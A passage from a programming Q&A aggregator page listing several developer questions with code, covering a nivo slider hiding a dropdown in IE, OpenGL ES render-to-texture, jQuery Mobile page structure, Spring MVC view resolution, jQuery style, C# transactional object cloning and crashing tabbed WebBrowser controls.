android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1047) 11-17 11:54:28.037: E/AndroidRuntime(282): at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2627) 11-17 11:54:28.037: E/AndroidRuntime(282): ... 11 more

    Read the article

  • nivo slider and drop down menu doesnt work in IE

    - by venom
    Does anyone has any idea why drop down menu in IE disappear under nivo slider? tried to play with z-index, didn't help, i also know that drop down menus dissappear under flash content, but this is not the case(wmode=transparent) as far as i know the nivo slider uses just jquery, no flash. here is the html: <table> <tr height="50"><td colspan="2" align="right" class="bottom_menu"> <ul id="nav" class="dropdown dropdown-horizontal" > <li><a href="/index.cfm?fuseaction=home.logout" class="dir" style="border:0 !important;" >Çikis</a></li> <li><a href="/index.cfm?fuseaction=objects2.list_basket" class="dir">Sepetim</a></li> <li><a href="/index.cfm?fuseaction=objects2.me" class="dir">Sirketim</a> <ul> <li><a href="/index.cfm?fuseaction=objects2.list_opportunities">Firsatlar</a></li> <li><a href="/index.cfm?fuseaction=objects2.form_add_partner">Sirkete Kullanici Ekle</a></li> <li><a href="/index.cfm?fuseaction=objects2.form_upd_my_company">Kullanici Yönetimi</a></li> <li><a href="/index.cfm?fuseaction=objects2.list_analyses">Analizler</a></li> <li><a href="/index.cfm?fuseaction=objects2.list_extre">Hesap Ekstresi</a></li> <li><a href="/index.cfm?fuseaction=objects2.popup_add_online_pos" target="_blank">Sanal Pos</a></li> </ul> </li> </ul> </td></tr> </table> <div id="banner"> <img src="/documents/templates/projedepo/l_top.gif" style="z-index:1;position:absolute; left:0; top:0;" width="24px" height="24px" border="0" /> <img src="/documents/templates/projedepo/r_top.gif" style="z-index:1;position:absolute; right:0; top:0;" width="24px" height="24px" border="0" /> <img src="/documents/templates/projedepo/l_bottom.gif" style="z-index:1;position:absolute; left:0; bottom:0;" width="24px" height="24px" border="0" /> <img src="/documents/templates/projedepo/r_bottom.gif" style="z-index:1;position:absolute; right:0; bottom:0;" width="24px" height="24px" border="0" /> <div class="banner_img"> <link rel="stylesheet" href="/documents/templates/projedepo/banner/nivo-slider.css" type="text/css" media="screen" /> <link rel="stylesheet" href="/documents/templates/projedepo/banner/style.css" type="text/css" media="screen" /> <div id="slider" class="nivoSlider"> <img title="#1" src="/documents/templates/projedepo/banner/canon.jpg" alt="" /> <img title="#2" src="/documents/templates/projedepo/banner/indigovision.jpg" alt="" /> </div> <div id="1" class="nivo-html-caption"> <a href="/index.cfm?fuseaction=objects2.detail_product&product_id=612&stock_id=612"><img src="/documents/templates/projedepo/banner/daha_fazlasi.jpg" border="0" /></a> </div> <div id="2" class="nivo-html-caption"> <a href="/index.cfm?fuseaction=objects2.detail_product&product_id=630&stock_id=630"><img src="/documents/templates/projedepo/banner/daha_fazlasi.jpg" border="0" /></a> </div> <script type="text/javascript" src="/JS/jquery.nivo.slider.pack.js"></script> <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider({ effect:'random', //Specify sets like: 'fold,fade,sliceDown' slices:15, animSpeed:1000, //Slide transition speed pauseTime:10000, startSlide:0, //Set starting Slide (0 index) directionNav:true, //Next & Prev directionNavHide:true, //Only show on hover controlNav:true, //1,2,3... controlNavThumbs:false, //Use thumbnails for Control Nav controlNavThumbsFromRel:false, //Use image rel for thumbs controlNavThumbsSearch: '.jpg', //Replace this with... controlNavThumbsReplace: '_thumb.jpg', //...this in thumb Image src keyboardNav:true, //Use left & right arrows pauseOnHover:true, //Stop animation while hovering manualAdvance:false, //Force manual transitions captionOpacity:1.0, //Universal caption opacity beforeChange: function(){}, afterChange: function(){}, slideshowEnd: function(){}, //Triggers after all slides have been shown lastSlide: function(){}, //Triggers when last slide is shown afterLoad: function(){} //Triggers when slider has loaded }); }); </script> </div> </div> Here is css for dropdown menu: http://www.micae.com/documents/templates/projedepo/default.css http://www.micae.com/documents/templates/projedepo/default.advanced.css http://www.micae.com/documents/templates/projedepo/dropdown.css and for nivo slider: http://www.micae.com/documents/templates/projedepo/banner/style.css http://www.micae.com/documents/templates/projedepo/banner/nivo-slider.css and for banner divs: #banner { position:relative; width:980px; height:435px; background:#fff; margin-bottom:20px; margin-top:-1px; color:#000; z-index:60; } .banner_img { padding:8px;position:absolute;z-index:2; } and the javascript by default, jquery and nivo slider http://www.micae.com/JS/jquery.nivo.slider.pack.js

    Read the article

  • another question about OpenGL ES rendering to texture

    - by ensoreus
    Hello, pros and gurus! Here is another question about rendering to texture. The whole stuff is all about saving texture between passing image into different filters. Maybe all iPhone developers knows about Apple's sample code with OpenGL processing where they used GL filters(functions), but pass into them the same source image. I need to edit an image by passing it sequentelly with saving the state of the image to edit. I am very noob in OpenGL, so I spent increadibly a lot of to solve the issue. So, I desided to create 2 FBO's and attach source image and temporary image as a textures to render in. Here is my init routine: glEnableClientState(GL_VERTEX_ARRAY); glEnableClientState(GL_TEXTURE_COORD_ARRAY); glEnable(GL_TEXTURE_2D); glPixelStorei(GL_UNPACK_ALIGNMENT, 1); glGetIntegerv(GL_FRAMEBUFFER_BINDING_OES, (GLint *)&SystemFBO); glImage = [self loadTexture:preparedImage]; //source image for (int i = 0; i < 4; i++) { fullquad[i].s *= glImage->s; fullquad[i].t *= glImage->t; flipquad[i].s *= glImage->s; flipquad[i].t *= glImage->t; } tmpImage = [self loadEmptyTexture]; //editing image glGenFramebuffersOES(1, &tmpImageFBO); glBindFramebufferOES(GL_FRAMEBUFFER_OES, tmpImageFBO); glFramebufferTexture2DOES(GL_FRAMEBUFFER_OES, GL_COLOR_ATTACHMENT0_OES, GL_TEXTURE_2D, tmpImage->texID, 0); GLenum status = glCheckFramebufferStatusOES(GL_FRAMEBUFFER_OES); if(status != GL_FRAMEBUFFER_COMPLETE_OES) { NSLog(@"failed to make complete tmp framebuffer object %x", status); } glBindTexture(GL_TEXTURE_2D, 0); glBindFramebufferOES(GL_FRAMEBUFFER_OES, 0); glGenRenderbuffersOES(1, &glImageFBO); glBindFramebufferOES(GL_FRAMEBUFFER_OES, glImageFBO); glFramebufferTexture2DOES(GL_FRAMEBUFFER_OES, GL_COLOR_ATTACHMENT0_OES, GL_TEXTURE_2D, glImage->texID, 0); status = glCheckFramebufferStatusOES(GL_FRAMEBUFFER_OES) ; if(status != GL_FRAMEBUFFER_COMPLETE_OES) { NSLog(@"failed to make complete cur framebuffer object %x", status); } glBindTexture(GL_TEXTURE_2D, 0); glBindFramebufferOES(GL_FRAMEBUFFER_OES, 0); When user drag the slider, this routine invokes to apply changes -(void)setContrast:(CGFloat)value{ contrast = value; if(flag!=mfContrast){ NSLog(@"contrast: dumped"); flag = mfContrast; glBindFramebufferOES(GL_FRAMEBUFFER_OES, glImageFBO); glClearColor(1,1,1,1); glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT); glMatrixMode(GL_PROJECTION); glLoadIdentity(); glOrthof(0, 512, 0, 512, -1, 1); glMatrixMode(GL_MODELVIEW); glLoadIdentity(); glScalef(512, 512, 1); glBindTexture(GL_TEXTURE_2D, tmpImage->texID); glViewport(0, 0, 512, 512); glVertexPointer(2, GL_FLOAT, sizeof(V2fT2f), &fullquad[0].x); glTexCoordPointer(2, GL_FLOAT, sizeof(V2fT2f), &fullquad[0].s); glDrawArrays(GL_TRIANGLE_STRIP, 0, 4); glBindFramebufferOES(GL_FRAMEBUFFER_OES, 0); } glBindFramebufferOES(GL_FRAMEBUFFER_OES,tmpImageFBO); glClearColor(0,0,0,1); glClear(GL_COLOR_BUFFER_BIT); glEnable(GL_TEXTURE_2D); glActiveTexture(GL_TEXTURE0); glMatrixMode(GL_PROJECTION); glLoadIdentity(); glOrthof(0, 512, 0, 512, -1, 1); glMatrixMode(GL_MODELVIEW); glLoadIdentity(); glScalef(512, 512, 1); glBindTexture(GL_TEXTURE_2D, glImage->texID); glViewport(0, 0, 512, 512); [self contrastProc:fullquad value:contrast]; glBindFramebufferOES(GL_FRAMEBUFFER_OES, 0); [self redraw]; } Here are two cases: if it is the same filter(edit mode) to use, I bind tmpFBO to draw into tmpImage texture and edit glImage texture. contrastProc is a pure routine from Apples's sample. If it is another mode, than I save edited image by drawing tmpImage texture in source texture glImage, binded with glImageFBO. After that I call redraw: glBindFramebufferOES(GL_FRAMEBUFFER_OES, SystemFBO); glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT); glMatrixMode(GL_PROJECTION); glLoadIdentity(); glOrthof(0, kTexWidth, 0, kTexHeight, -1, 1); glMatrixMode(GL_MODELVIEW); glLoadIdentity(); glScalef(kTexWidth, kTexHeight, 1); glBindTexture(GL_TEXTURE_2D, glImage->texID); glViewport(0, 0, kTexWidth, kTexHeight); glVertexPointer(2, GL_FLOAT, sizeof(V2fT2f), &flipquad[0].x); glTexCoordPointer(2, GL_FLOAT, sizeof(V2fT2f), &flipquad[0].s); glDrawArrays(GL_TRIANGLE_STRIP, 0, 4); glBindFramebufferOES(GL_FRAMEBUFFER_OES, 0); And here it binds visual framebuffer and dispose glImage texture. So, the result is VERY aggresive filtering. Increasing contrast volume by just 0.2 brings image to state that comparable with 0.9 contrast volume in Apple's sample code project. I miss something obvious, I guess. Interesting, if I disabple line glBindTexture(GL_TEXTURE_2D, glImage->texID); in setContrast routine it brings no effect. At all. If I replace tmpImageFBO with SystemFBO to draw glImage directly on display(and disabling redraw invoking line), all works fine. Please, HELP ME!!! :(

    Read the article

  • Jquery mobile page structure

    - by Die 20
    I built a jquery mobile site a while back and I have recently been expanding on it and noticing performance issues. I believe it is because I constructed the site using a multi-page set up where a single php file houses the following pages: **ALL_PAGES.PHP** <html> <head> /* external css and js files */ </head> <body> <div date-role="page" id="main"> <div class="page_link"> page 1 </div> <div class="page_link"> page 2 </div> <div class="page_link"> page 3 </div> </div> <div date-role="page" id="page 1"> <div class="page_link"> main </div> <div class="page_link"> page 2 </div> <div class="page_link"> page 3 </div> </div> <div date-role="page" id="page 2"> <div class="page_link"> main </div> <div class="page_link"> page 1 </div> <div class="page_link"> page 3 </div> </div> <div date-role="page" id="page 3"> <div class="page_link"> main </div> <div class="page_link"> page 1 </div> <div class="page_link"> page 2 </div> </div> </body> </html> **end ALL_PAGES.PHP ** I want to break away from this multi-page setup on one php file, and move to a setup where each page is a separate php file. To accomplish this I took the html from each page and moved it to its own php page. Then I added href links in replace of the mobile.change() functions I used for the "page_link" classes. **MAIN.PHP** <html> <head> external css and js files </head> <body> <div date-role="page" id="page 1"> <a href="/main.php"> main </a> <a href="/page_2.php"> page 2 </a> <a href="/page_3.php"> page 3 </a> </div> </body> </html> **end MAIN.PHP** **PAGE_1.PHP** <div date-role="page" id="page 1"> <a href="/main.php"> main </a> <a href="/page_2.php"> page 2 </a> <a href="/page_3.php"> page 3 </a> </div> **end PAGE_1.PHP** **PAGE_2.PHP** <div date-role="page" id="page 2"> <a href="/main.php"> main </a> <a href="/page_1.php"> page 1 </a> <a href="/page_3.php"> page 3 </a> </div> **end PAGE_2.PHP** **PAGE_3.PHP** <div date-role="page" id="page 3"> <a href="/main.php"> main </a> <a href="/page_1.php"> page 1 </a> <a href="/page_2.php"> page 2 </a> </div> **end PAGE_3.PHP** The site works fine except when the user hits the refresh button in the browser. When that happens each page loses access to any external css and js files located on the main page. I am fairly new to JQM so any advice would be helpful.

    Read the article

  • spring mvc forward to jsp

    - by jerluc
    I currently have my web.xml configured to catch 404s and send them to my spring controller which will perform a search given the original URL request. The functionality is all there as far as the catch and search go, however the trouble begins to arise when I try to return a view. <bean class="org.springframework.web.servlet.view.ContentNegotiatingViewResolver" p:order="1"> <property name="mediaTypes"> <map> <entry key="json" value="application/json" /> <entry key="jsp" value="text/html" /> </map> </property> <property name="defaultContentType" value="application/json" /> <property name="favorPathExtension" value="true" /> <property name="viewResolvers"> <list> <bean class="org.springframework.web.servlet.view.BeanNameViewResolver" /> <bean id="viewResolver" class="org.springframework.web.servlet.view.InternalResourceViewResolver"> <property name="prefix" value="/WEB-INF/jsp/" /> <property name="suffix" value="" /> </bean> </list> </property> <property name="defaultViews"> <list> <bean class="org.springframework.web.servlet.view.json.MappingJacksonJsonView" /> </list> </property> <property name="ignoreAcceptHeader" value="true" /> </bean> This is a snippet from my MVC config file. The problem lies in resolving the view's path to the /WEB-INF/jsp/ directory. Using a logger in my JBoss setup, I can see that when I test this search controller by going to a non-existent page, the following occurs: Server can't find the request Request is sent to 404 error page (in this case my search controller) Search controller performs search Search controller returns view name (for this illustration, we'll assume test.jsp is returned) Based off of server logger, I can see that org.springframework.web.servlet.view.JstlView is initialized once my search controller returns the view name (so I can assume it is being picked up correctly by the InternalResourceViewResolver) Server attempts to return content to browser resulting in a 404! A couple things confuse me about this: I'm not 100% sure why this isn't resolving when test.jsp clearly exists under the /WEB-INF/jsp/ directory. Even if there was some other problem, why would this result in a 404? Shouldn't a 404 error page that results in another 404 theoretically create an infinite loop? Thanks for any help or pointers! Controller class [incomplete]: @Controller public class SiteMapController { //-------------------------------------------------------------------------------------- @Autowired(required=true) private SearchService search; @Autowired(required=true) private CatalogService catalog; //-------------------------------------------------------------------------------------- @RequestMapping(value = "/sitemap", method = RequestMethod.GET) public String sitemap (HttpServletRequest request, HttpServletResponse response) { String forwardPath = ""; try { long startTime = System.nanoTime() / 1000000; String pathQuery = (String) request.getAttribute("javax.servlet.error.request_uri"); Scanner pathScanner = new Scanner(pathQuery).useDelimiter("\\/"); String context = pathScanner.next(); List<ProductLightDTO> results = new ArrayList<ProductLightDTO>(); StringBuilder query = new StringBuilder(); String currentValue; while (pathScanner.hasNext()) { currentValue = pathScanner.next().toLowerCase(); System.out.println(currentValue); if (query.length() > 0) query.append(" AND "); if (currentValue.contains("-")) { query.append("\""); query.append(currentValue.replace("-", " ")); query.append("\""); } else { query.append(currentValue + "*"); } } //results.addAll(this.doSearch(query.toString())); System.out.println("Request: " + pathQuery); System.out.println("Built Query:" + query.toString()); //System.out.println("Result size: " + results.size()); long totalTime = (System.nanoTime() / 1000000) - startTime; System.out.println("Total TTP: " + totalTime + "ms"); if (results == null || results.size() == 0) { forwardPath = "home.jsp"; } else if (results.size() == 1) { forwardPath = "product.jsp"; } else { forwardPath = "category.jsp"; } } catch (Exception ex) { System.err.println(ex); } System.out.println("Returning view: " + forwardPath); return forwardPath; } }

    Read the article

  • jQuery programming style?

    - by Sam Dufel
    I was recently asked to fix something on a site which I haven't worked on before. I haven't really worked with jQuery that much, but I figured I'd take a look and see if I could fix it. I've managed to mostly clear up the problem, but I'm still horrified at the way they chose to build this site. On document load, they replace the click() method of every anchor tag and form element with the same massive function. When clicked, that function then checks if the tag has one of a few different attributes (non-standard attributes, even), and does a variety of different tasks depending on what attributes exist and what their values are. Some hyperlinks have an attribute on them called 'ajaxrel', which makes the click() function look for another (hidden) hyperlink with an ID specified by the ajaxrel attribute, and then calls the click() function for that other hyperlink (which was also modified by this same click() function). On the server side, all the php files are quite long and have absolutely no indentation. This whole site has been a nightmare to debug. Is this standard jQuery practice? This navigation scheme seems terrible. Does anyone else actually use jQuery this way? I'd like to start incorporating it into my projects, but looking at this site is giving me a serious headache. Here's the click() function for hyperlinks: function ajaxBoxA(theElement, urltosend, ajaxbox, dialogbox) { if ($(theElement).attr("href") != undefined) var urltosend = $(theElement).attr("href"); if ($(theElement).attr('toajaxbox') != undefined) var ajaxbox = $(theElement).attr('toajaxbox'); // check to see if dialog box is called for. if ($(theElement).attr('dialogbox') != undefined) var dialogbox = $(theElement).attr('dialogbox'); var dodialog = 0; if (dialogbox != undefined) { // if dialogbox doesn't exist, then flag to create dialog box. var isDiaOpen = $('[ajaxbox="' + ajaxbox + '"]').parent().parent().is(".ui-dialog-container"); dodialog = 1; if (isDiaOpen) { dodialog = 0; } dialogbox = parseUri(dialogbox); dialogoptions = { close: function () { // $("[id^=hierarchy]",this).NestedSortableDestroy(); $(this).dialog('destroy').remove() } }; for ( var keyVar in dialogbox['queryKey'] ) eval( "dialogoptions." + keyVar + " = dialogbox['queryKey'][keyVar]"); }; $("body").append("<div id='TB_load'><img src='"+imgLoader.src+"' /></div>"); $('#TB_load').show(); if (urltosend.search(/\?/) > 0) { urltosend = urltosend + "&-ajax=1"; } else { urltosend = urltosend + "?-ajax=1"; } if ($('[ajaxbox="' + ajaxbox + '"]').length) { $('[ajaxbox="' + ajaxbox + '"]').each( function () { $(this).empty(); }); }; $.ajax({ type: "GET", url: urltosend, data: "", async: false, dataType: "html", success: function (html) { var re = /^<toajaxbox>(.*?)<\/toajaxbox>+(.*)/; if (re.test(html)) { var match = re.exec(html); ajaxbox = match[1]; html = Right(html, String(html).length - String(match[1]).length); } var re = /^<header>(.*?)<\/header>+(.*)/; if (re.test(html)) { var match = re.exec(html); window.location = match[1]; return false; } if (html.length > 0) { var newHtml = $(html); if ($('[ajaxbox="' + ajaxbox + '"]').length) { $('[ajaxbox="' + ajaxbox + '"]').each( function () { $(this).replaceWith(newHtml).ready( function () { ajaxBoxInit(newHtml) if (window.ajaxboxsuccess) ajaxboxsuccess(newHtml); }); }); if ($('[ajaxdialog="' + ajaxbox + '"]').length = 0) { if (dodialog) $(newHtml).wrap("<div class='flora ui-dialog-content' ajaxdialog='" + ajaxbox + "' style='overflow:auto;'></div>").parent().dialog(dialogoptions); } } else { $("body").append(newHtml).ready( function () { ajaxBoxInit(newHtml); if (window.ajaxboxsuccess) ajaxboxsuccess(newHtml); }); if (dodialog) $(newHtml).wrap("<div class='flora ui-dialog-content' ajaxdialog='" + ajaxbox + "' style='overflow:auto;'></div>").parent().dialog(dialogoptions); } } var rel = $(theElement).attr('ajaxtriggerrel'); if (rel != undefined) $('a[ajaxrel="' + rel + '"]').click(); tb_remove(); return false; }, complete: function () { $("#TB_load").remove(); } }); return false; }

    Read the article

  • Javascript: selfmade methods not working correctly

    - by hdr
    Hi everyone, I tried to figure this out for some days now, I tried to use my own object to sort of replace the global object to reduce problems with other scripts (userscripts, chrome extensions... that kind of stuff). However I can't get things to work for some reason. I tried some debugging with JSLint, the developer tools included in Google Chrome, Firebug and the integrated schript debugger in IE8 but there is no error that explains why it doesn't work at all in any browser I tried. I tried IE 8, Google Chrome 10.0.612.3 dev, Firefox 3.6.13, Safari 5.0.3 and Opera 11. So... here is the code: HTML: <!DOCTYPE HTML> <html manifest="c.manifest"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta charset="utf-8"> <!--[if IE]> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/chrome-frame/1/CFInstall.min.js"></script> <script src="https://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js">IE7_PNG_SUFFIX=".png";</script> <![endif]--> <!--[if lt IE 9]> <script src="js/lib/excanvas.js"></script> <script src="https://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script src="js/data.js"></script> </head> <body> <div id="controls"> <button onclick="MYOBJECTis.next()">Next</button> </div> <div id="textfield"></div> <canvas id="game"></canvas> </body> </html> Javascript: var that = window, it = document, k = Math.floor; var MYOBJECTis = { aresizer: function(){ // This method looks like it doesn't work. // It should automatically resize all the div elements and the body. // JSLint: no error (execpt for "'window' is not defined." which is normal since // JSLint does nor recognize references to the global object like "window" or "self" // even if you assume a browser) // Firebug: no error // Chrome dev tools: no error // IE8: that.documentElement.clientWidth is null or not an object "use strict"; var a = that.innerWidth || that.documentElement.clientWidth, d = that.innerHeight || that.documentElement.clientHeight; (function() { for(var b = 0, c = it.getElementsByTagName("div");b < c.length;b++) { c.style.width = k(c.offsetWidth) / 100 * k(a); c.style.height = k(c.offsetHight) / 100 * k(d); } }()); (function() { var b = it.getElementsByTagName("body"); b.width = a; b.height = d; }()); }, next: function(){ // This method looks like it doesn't work. // It should change the text inside a div element // JSLint: no error (execpt for "'window' is not defined.") // Firebug: no error // Chrome dev tools: no error // IE8: no error (execpt for being painfully slow) "use strict"; var b = it.getElementById("textfield"), a = [], c; switch(c !== typeof Number){ case true: a[1] = ["HI"]; c = 0; break; case false: return Error; default: b.innerHtml = a[c]; c+=1; } } }; // auto events (function(){ "use strict"; that.onresize = MYOBJECTis.aresizer(); }()); If anyone can help me out with this I would very much appreciate it. EDIT: To answer the question what's not working I can just say that no method I showed here is working at all and I don't know the cause of the problem. I also tried to clean up some of the code that has most likely nothing to do with it. Additional information is in the comments inside the code.

    Read the article

  • Replacing objects, handling clones, dealing with write logs

    - by Alix
    Hi everyone, I'm dealing with a problem I can't figure out how to solve, and I'd love to hear some suggestions. [NOTE: I realise I'm asking several questions; however, answers need to take into account all of the issues, so I cannot split this into several questions] Here's the deal: I'm implementing a system that underlies user applications and that protect shared objects from concurrent accesses. The application programmer (whose application will run on top of my system) defines such shared objects like this: public class MyAtomicObject { // These are just examples of fields you may want to have in your class. public virtual int x { get; set; } public virtual List<int> list { get; set; } public virtual MyClassA objA { get; set; } public virtual MyClassB objB { get; set; } } As you can see they declare the fields of their class as auto-generated properties (auto-generated means they don't need to implement get and set). This is so that I can go in and extend their class and implement each get and set myself in order to handle possible concurrent accesses, etc. This is all well and good, but now it starts to get ugly: the application threads run transactions, like this: The thread signals it's starting a transaction. This means we now need to monitor its accesses to the fields of the atomic objects. The thread runs its code, possibly accessing fields for reading or writing. If there are accesses for writing, we'll hide them from the other transactions (other threads), and only make them visible in step 3. This is because the transaction may fail and have to roll back (undo) its updates, and in that case we don't want other threads to see its "dirty" data. The thread signals it wants to commit the transaction. If the commit is successful, the updates it made will now become visible to everyone else. Otherwise, the transaction will abort, the updates will remain invisible, and no one will ever know the transaction was there. So basically the concept of transaction is a series of accesses that appear to have happened atomically, that is, all at the same time, in the same instant, which would be the moment of successful commit. (This is as opposed to its updates becoming visible as it makes them) In order to hide the write accesses in step 2, I clone the accessed field (let's say it's the field list) and put it in the transaction's write log. After that, any time the transaction accesses list, it will actually be accessing the clone in its write log, and not the global copy everyone else sees. Like this, any changes it makes will be done to the (invisible) clone, not to the global copy. If in step 3 the commit is successful, the transaction should replace the global copy with the updated list it has in its write log, and then the changes become visible for everyone else at once. It would be something like this: myAtomicObject.list = updatedCloneOfListInTheWriteLog; Problem #1: possible references to the list. Let's say someone puts a reference to the global list in a dictionary. When I do... myAtomicObject.list = updatedCloneOfListInTheWriteLog; ...I'm just replacing the reference in the field list, but not the real object (I'm not overwriting the data), so in the dictionary we'll still have a reference to the old version of the list. A possible solution would be to overwrite the data (in the case of a list, empty the global list and add all the elements of the clone). More generically, I would need to copy the fields of one list to the other. I can do this with reflection, but that's not very pretty. Is there any other way to do it? Problem #2: even if problem #1 is solved, I still have a similar problem with the clone: the application programmer doesn't know I'm giving him a clone and not the global copy. What if he puts the clone in a dictionary? Then at commit there will be some references to the global copy and some to the clone, when in truth they should all point to the same object. I thought about providing a wrapper object that contains both the cloned list and a pointer to the global copy, but the programmer doesn't know about this wrapper, so they're not going to use the pointer at all. The wrapper would be like this: public class Wrapper<T> : T { // This would be the pointer to the global copy. The local data is contained in whatever fields the wrapper inherits from T. private T thisPtr; } I do need this wrapper for comparisons: if I have a dictionary that has an entry with the global copy as key, if I look it up with the clone, like this: dictionary[updatedCloneOfListInTheWriteLog] I need it to return the entry, that is, to think that updatedCloneOfListInTheWriteLog and the global copy are the same thing. For this, I can just override Equals, GetHashCode, operator== and operator!=, no problem. However I still don't know how to solve the case in which the programmer unknowingly inserts a reference to the clone in a dictionary. Problem #3: the wrapper must extend the class of the object it wraps (if it's wrapping MyClassA, it must extend MyClassA) so that it's accepted wherever an object of that class (MyClass) would be accepted. However, that class (MyClassA) may be final. This is pretty horrible :$. Any suggestions? I don't need to use a wrapper, anything you can think of is fine. What I cannot change is the write log (I need to have a write log) and the fact that the programmer doesn't know about the clone. I hope I've made some sense. Feel free to ask for more info if something needs some clearing up. Thanks so much!

    Read the article

  • How to detect crashing tabed webbrowser and handle it?

    - by David Eaton
    I have a desktop application (forms) with a tab control, I assign a tab and a new custom webrowser control. I open up about 10 of these tabs. Each one visits about 100 - 500 different pages. The trouble is that if 1 webbrowser control has a problem it shuts down the entire program. I want to be able to close the offending webbrowser control and open a new one in it's place. Is there any event that I need to subscribe to catch a crashing or unresponsive webbrowser control ? I am using C# on windows 7 (Forms), .NET framework v4 =============================================================== UPDATE: 1 - The Tabbed WebBrowser Example Here is the code I have and How I use the webbrowser control in the most basic way. Create a new forms project and name it SimpleWeb Add a new class and name it myWeb.cs, here is the code to use. using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Windows.Forms; using System.Security.Policy; namespace SimpleWeb { //inhert all of webbrowser class myWeb : WebBrowser { public myWeb() { //no javascript errors this.ScriptErrorsSuppressed = true; //Something we want set? AssignEvents(); } //keep near the top private void AssignEvents() { //assign WebBrowser events to our custom methods Navigated += myWeb_Navigated; DocumentCompleted += myWeb_DocumentCompleted; Navigating += myWeb_Navigating; NewWindow += myWeb_NewWindow; } #region Events //List of events:http://msdn.microsoft.com/en-us/library/system.windows.forms.webbrowser_events%28v=vs.100%29.aspx //Fired when a new windows opens private void myWeb_NewWindow(object sender, System.ComponentModel.CancelEventArgs e) { //cancel all popup windows e.Cancel = true; //beep to let you know canceled new window Console.Beep(9000, 200); } //Fired before page is navigated (not sure if its before or during?) private void myWeb_Navigating(object sender, System.Windows.Forms.WebBrowserNavigatingEventArgs args) { } //Fired after page is navigated (but not loaded) private void myWeb_Navigated(object sender, System.Windows.Forms.WebBrowserNavigatedEventArgs args) { } //Fired after page is loaded (Catch 22 - Iframes could be considered a page, can fire more than once. Ads are good examples) private void myWeb_DocumentCompleted(System.Object sender, System.Windows.Forms.WebBrowserDocumentCompletedEventArgs args) { } #endregion //Answer supplied by mo. (modified)? public void OpenUrl(string url) { try { //this.OpenUrl(url); this.Navigate(url); } catch (Exception ex) { MessageBox.Show("Your App Crashed! Because = " + ex.ToString()); //MyApplication.HandleException(ex); } } //Keep near the bottom private void RemoveEvents() { //Remove Events Navigated -= myWeb_Navigated; DocumentCompleted -= myWeb_DocumentCompleted; Navigating -= myWeb_Navigating; NewWindow -= myWeb_NewWindow; } } } On Form1 drag a standard tabControl and set the dock to fill, you can go into the tab collection and delete the pre-populated tabs if you like. Right Click on Form1 and Select "View Code" and replace it with this code. using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using mshtml; namespace SimpleWeb { public partial class Form1 : Form { public Form1() { InitializeComponent(); //Load Up 10 Tabs for (int i = 0; i <= 10; i++) { newTab("Test_" + i, "http://wwww.yahoo.com"); } } private void newTab(string Title, String Url) { //Create a new Tab TabPage newTab = new TabPage(); newTab.Name = Title; newTab.Text = Title; //create webbrowser Instance myWeb newWeb = new myWeb(); //Add webbrowser to new tab newTab.Controls.Add(newWeb); newWeb.Dock = DockStyle.Fill; //Add New Tab to Tab Pages tabControl1.TabPages.Add(newTab); newWeb.OpenUrl(Url); } } } Save and Run the project. Using the answer below by mo. , you can surf the first url with no problem, but what about all the urls the user clicks on? How do we check those? I prefer not to add events to every single html element on a page, there has to be a way to run the new urls thru the function OpenUrl before it navigates without having an endless loop. Thanks.

    Read the article

< Previous Page | 366 367 368 369 370 371 372 373 374 375 376 377  | Next Page >